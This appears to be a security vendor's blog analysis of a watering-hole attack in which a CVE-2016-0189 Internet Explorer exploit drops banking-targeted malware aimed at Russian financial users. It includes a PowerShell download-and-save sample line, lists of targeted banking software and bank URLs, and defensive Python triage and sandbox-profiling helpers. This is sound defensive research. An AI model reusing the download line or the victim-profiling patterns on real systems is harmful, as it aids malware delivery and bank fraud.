The infection chain starts with the compromised site eurolab[.]ua, a popular health site in Ukraine that reaches about half a million visitors per month. It is important to note that even though the site is Ukrainian, 40% of its visitors are from Russia according to Alexa statistics. This becomes clearly relevant to the rest of our analysis.

The compromised site redirects visitors to rozhlas[.]site, which hosts a browser exploit for CVE-2016-0189. This exploit is effective against unpatched Microsoft Internet Explorer versions 9 through 11. After successful exploitation, an embedded PowerShell script downloads a first stage malware, which in turn downloads NSIS-packed payloads containing spying modules and a backdoor.

In this blog post we cover the infection chain and the first stage malware.

Infection Chain Analysis
Infection chain:
[Image: infection chain diagram]

In the above chain you can see that the page rozhlas[.]site/news/business/ contains the aforementioned IE exploit. The following snippet of code shows the VBScript exploit for CVE-2016-0189:
[Image: VBScript exploit code]

After successful execution of the exploit, it runs an embedded PowerShell script to download the first stage malware. The VBScript subroutine firewrite performs this task.
[Image: firewrite subroutine launching the encoded PowerShell command]

As we can see, the PowerShell script is base64 encoded. The following snapshot shows the de-obfuscated script, which downloads the first stage malware into a file called cache.bin.

[Image: decoded PowerShell download script]
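The base64 layer seen above is the same encoding PowerShell's -EncodedCommand switch uses (UTF-16LE text, then base64), so a defender's first triage step is to decode it and look for download indicators. The following Python helper is an added example, not code from the original post or from the malware: it builds its own constructed sample command line (the URL is a placeholder, not the real download location), decodes the blob, and reports download-related keywords and URLs found in the decoded script.

```python
import base64
import re

# Constructed sample: a download one-liner of the same shape the post describes
# (fetch a file into cache.bin), encoded the way -EncodedCommand expects.
# The URL is a placeholder chosen for this example, not the real one.
SAMPLE_COMMAND = (
    "(New-Object System.Net.WebClient).DownloadFile("
    "'http://placeholder.invalid/cache.bin', \"$env:TEMP\\cache.bin\")"
)
SAMPLE_ENCODED = base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -Enc " + SAMPLE_ENCODED

# Keywords that commonly indicate a download-and-run stage; checked case-insensitively.
DOWNLOAD_INDICATORS = (
    "Net.WebClient", "DownloadFile", "DownloadString",
    "Invoke-WebRequest", "Start-BitsTransfer", "Invoke-Expression", "IEX",
)

# Matches -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
_ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(blob: str) -> str:
    """Decode an -EncodedCommand payload. PowerShell emits UTF-16LE, so for an
    ASCII script every odd byte is NUL; if that is not the case, assume UTF-8
    (some tooling base64-encodes plain UTF-8 instead)."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def find_indicators(script: str) -> list:
    """Return the download indicators present in the script, in table order."""
    lowered = script.lower()
    return [word for word in DOWNLOAD_INDICATORS if word.lower() in lowered]


def extract_urls(script: str) -> list:
    """Pull http(s) URLs out of a decoded script for blocklist or sandbox lookup."""
    return re.findall(r"https?://[^\s'\"()]+", script)


def triage_command_line(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line (if any) and summarise it."""
    match = _ENC_ARG.search(cmdline)
    script = decode_encoded_command(match.group(1)) if match else cmdline
    return {
        "encoded": match is not None,
        "script": script,
        "indicators": find_indicators(script),
        "urls": extract_urls(script),
    }


if __name__ == "__main__":
    result = triage_command_line(SAMPLE_CMDLINE)
    print(result["script"])
    print("indicators:", result["indicators"])
    print("urls:", result["urls"])
```

The UTF-16 heuristic matters in practice: a blob that fails to decode cleanly as UTF-16LE is usually a UTF-8 base64 string from a different loader, not corrupt data, so the helper falls back rather than discarding it.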

We will cover the detailed analysis of this malware in this blog.

First Stage Malware Analysis

The main purpose of this first stage malware is to check certain environmental factors to confirm that its victim is a worthwhile target. It first checks for specific banking software and the user's browsing history, and based on that it decides whether to download the second stage malware. It is clear from this technique that the hacker group is only interested in implanting their malware on systems that are part of a banking environment.

This malware logs information in c:\Loginfo.txt and C:\WINDOWS\Debug\UserMode\userenv.txt.

If either of the two checks (banking software or browsing history) is true, it downloads its second stage malware using the following URL link:

Otherwise, it downloads a benign sample using the link below. This is an anti-analysis and anti-sandbox technique employed by the malware.

The malicious file is saved as %appdata%\..\ssl_bapi.exe or %tmp%\ssl_bapi.exe, depending on the Windows version.

Digital certificate:
[Image: digital signature details of the first stage binary]

It is clear that the malware is trying to bypass some anti-malware solutions by utilizing a signed binary, even though the signature is not valid.

1) Banking-related running process & installed software checks
Running process check:
In this check it performs the WMI query "SELECT Name FROM Win32_Process" to enumerate the processes running on the victim's computer. If this fails, it performs the same check with the Process32First and Process32Next APIs.
The following code snippet shows the WMI implementation:
[Image: WMI process enumeration code]

The following implementation shows the Process32First & Process32Next loop used to find running processes.
[Image: Process32First/Process32Next loop]

All of the following software is related to Russian banks, so it seems this malware targets Russian financial institutions.
[Image: list of targeted banking process and file names]

Installed software check:
This is the implementation that performs the installed software check in various locations in order to confirm the victim is using certain banking applications.
[Image: installed software check code]

List of locations :
%PROFILE% : “iBank2”
%APPDATA% : “amicon,bifit,*bss,*ibank”
%PROGRAMFILES32% : “*gpb,inist,mdm,bifit,Aladdin,Amicon,*bss,Signal-COM,iBank2,*\\bc.exe,*\\*\\intpro.exe,*cft,agava,*R-Style,*AKB Perm”
%PROGRAMFILES64% : “*gpb,inist,mdm,bifit,Aladdin,Amicon,*bss,Signal-COM,iBank2,*\\bc.exe,*\\*\\intpro.exe,*cft,agava,*R-Style,*AKB Perm”
%SYSTEMDRIVE% : “*SFT,*Agava,*Clnt,*CLUNION.0QT,*5NT,*BS,*ELBA,*Bank,ICB_C,*sped,*gpb”
%Desktop%: “*ELBA,*ELBRUS”

2) Victim's browsing history checks
The following screenshot shows the various locations used by the malware to check the caches of several browsers.
[Image: browser history check code]

Below is the list of locations referred to by the malware:
%localappdata%\Google\Chrome\User Data\Default\History
%appdata%\Google\Chrome\User Data\Default\History
%appdata%\Mozilla\Firefox\Profiles
%appdata%\Opera\Opera\global_history.dat

This malware uses the FindFirstUrlCacheEntryA API to query the above-mentioned locations. The following screenshot shows the implementation.
[Image: FindFirstUrlCacheEntryA query code]

The malware tries to match the Victim’s browser cache with any of the following strings: 
*ICPortalSSL*
*isfront.priovtb.com*
*PortalSSL*
*beta.mcb.ru*
*ibank*
*ibrs*
*iclient*
*e-plat.mdmbank.com*
*sberweb.zubsb.ru*
*ibc*
*elbrus*
*i-elba*
*clbank.minbank.ru*
*chelindbank.ru/online/*
*uwagb*
*wwwbank*
*dbo*
*ib.

Again, all of these strings lead to Russian banking web sites.
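Both victim checks above (the installed software locations and the browser history strings) are plain wildcard matches, and the practical consequence for a defender is that an analysis VM which trips none of them only ever receives the benign decoy. The following Python is an added example, not code from the post or from the malware: it encodes the two pattern tables exactly as listed above and evaluates them against a constructed directory inventory and browsing history, so an analyst can check whether a sandbox image would pass the profiling before detonating the sample. The mapping of the location variables to directories, the inventory, the URLs, and the rule that a pattern containing a backslash is tested against the whole relative path while a bare name is tested against the top-level directory are all assumptions made for this example.

```python
import fnmatch

# Location -> comma-separated pattern list, copied from the post. The double
# backslashes are Python escapes, so "*\\bc.exe" is the pattern *\bc.exe.
SOFTWARE_CHECKS = {
    "%PROFILE%": "iBank2",
    "%APPDATA%": "amicon,bifit,*bss,*ibank",
    "%PROGRAMFILES32%": "*gpb,inist,mdm,bifit,Aladdin,Amicon,*bss,Signal-COM,iBank2,"
                        "*\\bc.exe,*\\*\\intpro.exe,*cft,agava,*R-Style,*AKB Perm",
    "%PROGRAMFILES64%": "*gpb,inist,mdm,bifit,Aladdin,Amicon,*bss,Signal-COM,iBank2,"
                        "*\\bc.exe,*\\*\\intpro.exe,*cft,agava,*R-Style,*AKB Perm",
    "%SYSTEMDRIVE%": "*SFT,*Agava,*Clnt,*CLUNION.0QT,*5NT,*BS,*ELBA,*Bank,ICB_C,*sped,*gpb",
    "%Desktop%": "*ELBA,*ELBRUS",
}

# Browser history strings, copied from the post ("*ib." has no trailing wildcard).
HISTORY_PATTERNS = [
    "*ICPortalSSL*", "*isfront.priovtb.com*", "*PortalSSL*", "*beta.mcb.ru*",
    "*ibank*", "*ibrs*", "*iclient*", "*e-plat.mdmbank.com*", "*sberweb.zubsb.ru*",
    "*ibc*", "*elbrus*", "*i-elba*", "*clbank.minbank.ru*", "*chelindbank.ru/online/*",
    "*uwagb*", "*wwwbank*", "*dbo*", "*ib.",
]

# Assumed mapping of the malware's location variables to directories on a
# hypothetical analysis VM (standard Windows defaults for a user named "analyst").
SAMPLE_ROOTS = {
    "%PROFILE%": "C:\\Users\\analyst",
    "%APPDATA%": "C:\\Users\\analyst\\AppData\\Roaming",
    "%PROGRAMFILES32%": "C:\\Program Files (x86)",
    "%PROGRAMFILES64%": "C:\\Program Files",
    "%SYSTEMDRIVE%": "C:",
    "%Desktop%": "C:\\Users\\analyst\\Desktop",
}

# Constructed directory inventory of that VM; the BSS entry is a deliberate decoy.
SAMPLE_INVENTORY = [
    "C:\\Program Files (x86)\\BSS\\bc.exe",
    "C:\\Program Files\\7-Zip\\7z.exe",
    "C:\\Users\\analyst\\AppData\\Roaming\\Microsoft\\Windows",
    "C:\\Users\\analyst\\Desktop\\notes.txt",
]

# Constructed browsing history; the hosts are not real banks.
SAMPLE_HISTORY = [
    "https://news.example.test/",
    "https://ibank.example-bank.test/login",
    "https://www.example.test/dbo/",
]


def _matches(subject: str, pattern: str) -> bool:
    """Case-insensitive glob match; fnmatch's '*' also spans backslashes."""
    return fnmatch.fnmatchcase(subject.lower(), pattern.lower())


def evaluate_software_checks(inventory, roots):
    """Return (location, pattern, path) for every inventory path that trips a rule."""
    hits = []
    for location, patterns in SOFTWARE_CHECKS.items():
        root = roots[location].rstrip("\\") + "\\"
        for path in inventory:
            if not path.lower().startswith(root.lower()):
                continue
            rel = path[len(root):]
            top = rel.split("\\", 1)[0]
            for pattern in patterns.split(","):
                # Assumed rule: patterns with a backslash are tested against the
                # whole relative path, bare names only against the top directory.
                subject = rel if "\\" in pattern else top
                if _matches(subject, pattern):
                    hits.append((location, pattern, path))
    return hits


def evaluate_history_check(urls):
    """Return (url, pattern) for every history entry that matches a bank string."""
    return [(url, p) for url in urls for p in HISTORY_PATTERNS if _matches(url, p)]


def would_fetch_second_stage(inventory, roots, urls) -> bool:
    """Either check passing is enough for the real payload to be requested."""
    return bool(evaluate_software_checks(inventory, roots) or evaluate_history_check(urls))


if __name__ == "__main__":
    for hit in evaluate_software_checks(SAMPLE_INVENTORY, SAMPLE_ROOTS):
        print("software:", hit)
    for hit in evaluate_history_check(SAMPLE_HISTORY):
        print("history:", hit)
    print("second stage would be fetched:", would_fetch_second_stage(
        SAMPLE_INVENTORY, SAMPLE_ROOTS, SAMPLE_HISTORY))
```

Two points the tables make visible once they are executable: the `*bss` and `*ibank*` entries are short substrings and will also match unrelated directories or URLs, so the profiling is noisy rather than precise; and because the decision is an OR over both checks, seeding a sandbox with either a matching directory name or a matching history entry is sufficient to obtain the real second stage for analysis.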

Conclusion

It seems that hackers are still going after Russian banks even after the demise of the Lurk group and the very publicized arrests by Russian law enforcement. It also seems that this group has invested in expanding their capability by introducing a known vulnerability in their arsenal, which could be the result of insider knowledge of the software installed on targeted systems.

The second stage malware which we have not covered in this blog post shows advanced capability of keylogging, spying, smartcard reading etc. We will update this blog as further analysis becomes available.

References:
http://www.group-ib.com/brochures/gib-buhtrap-report.pdf
http://www.welivesecurity.com/2015/04/09/operation-buhtrap/

IOCs:
First stage malware hash: a6569546896b6d8ad95e4dbcc346a68b.

Analysis by Dhruval Gandhi & Paul Kimayong.